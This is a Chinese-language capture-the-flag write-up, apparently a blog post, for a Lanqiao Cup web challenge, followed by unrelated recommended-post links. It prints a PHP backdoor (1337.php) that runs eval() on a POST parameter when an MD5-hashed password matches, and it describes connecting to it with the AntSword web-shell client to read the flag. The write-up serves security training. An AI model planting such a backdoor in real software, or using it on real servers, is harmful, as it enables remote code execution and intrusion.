蓝桥杯-网络安全比赛题目-遗漏的压缩包

小蓝同学给你发来了他自己开发的网站链接,
他说他故意留下了一个压缩包文件,里面有网站的源代码,
他想考验一下你的网络安全技能。
(点击"下发赛题"后,你将得到一个http链接。如果该链接自动跳转到https,请手动将其改为http再进行访问。)
  1. 通过扫描工具扫出该网址下有www.zip文件,下载后查看其中的1337.php
php 复制代码
<?php
# leet
if(md5($_GET['pwd'])=='217f81b8ff0a1ab138a8e1bdc031262e'){
   eval($_POST['1337']);
}

可知MD5后的密文要等于'217f81b8ff0a1ab138a8e1bdc031262e'

输入密码,通过蚁剑进入SHELL

连接成功

进入根目录,找到flag

成功夺旗!

相关推荐
m0_748230944 分钟前
Rust赋能前端: 纯血前端将 Table 导出 Excel
前端·rust·excel
qq_5895681012 分钟前
Echarts的高级使用,动画,交互api
前端·javascript·echarts
不想当程序猿_13 分钟前
【蓝桥杯每日一题】分糖果——DFS
c++·算法·蓝桥杯·深度优先
鸭梨山大。35 分钟前
Jenkins 任意文件读取(CVE-2024-23897)修复及复现
安全·中间件·jenkins
逝灮1 小时前
【蓝桥杯——物联网设计与开发】基础模块8 - RTC
stm32·单片机·嵌入式硬件·mcu·物联网·蓝桥杯·rtc
网安墨雨1 小时前
常用网络协议
网络·网络协议
Tlzns1 小时前
Linux网络——UDP的运用
linux·网络·udp
黑客老陈1 小时前
新手小白如何挖掘cnvd通用漏洞之存储xss漏洞(利用xss钓鱼)
运维·服务器·前端·网络·安全·web3·xss
正小安1 小时前
Vite系列课程 | 11. Vite 配置文件中 CSS 配置(Modules 模块化篇)
前端·vite